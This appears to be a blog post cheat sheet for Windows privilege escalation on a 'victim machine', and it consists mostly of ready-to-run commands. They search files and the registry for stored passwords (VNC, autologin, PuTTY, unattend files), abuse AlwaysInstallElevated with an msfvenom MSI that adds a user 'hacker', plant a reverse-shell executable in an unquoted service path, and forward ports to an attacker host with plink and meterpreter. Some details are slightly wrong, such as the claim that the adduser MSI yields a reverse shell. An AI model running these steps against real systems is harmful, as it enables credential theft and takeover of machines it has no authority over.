1) Kernel Exploits:
Download windows exploit suggester and update the database excel sheet
Enter 'systeminfo' command in the victim machine, copy the output to a text file eg. sysinfo_victim.txt
./windows-exploit-suggester.py --database latest_databse_file_mssb.xlsx --systeminfo sysinfo_victim.txt2) Search for clear passwords:
In files-
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
Search for passwords-
--> Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*
--> Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
In Registry-
—> VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
—> Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
—> SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
—> Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
—> Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
3) Always Install Elevated:
To check if alwaysinstallelevated is enabled-
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
'The system was unable to find the specified registry key or value' means that the 'AlwaysInstallElevated' is not enabled.
If it is enabled, use msfvenom to generate .msi file, to install and get a reverse shell as Administrator.
msfvenom -p windows/adduser USER=hacker PASS=myPass -f msi -o escalate.msi
4) Trusted Service Path
To check-
using wmic
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
using sc
sc query
sc qc service name
look for binaries path name with space eg. 'C:\Program Files\Anti Virus\bin\scanner.exe'
To Exploit-
Generate a reverse shell in .exe extension using msfvenom, name it as Anti.exe, for example. Save it in "C:\Program Files\Anti,exe"
Now, restart the application to run the generated Anti.exe
sc stop scanner.exe
sc start scanner.exe
5)Services only available inside the victim machine
To check-
netstat -ano
To exploit-
Port forward the service to exploit it
—> Port forward using plink
plink.exe -l attacker_username -pw attacker_pass <attackerip> -R 8080:127.0.0.1:8080
—> Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101
No comments:
Post a Comment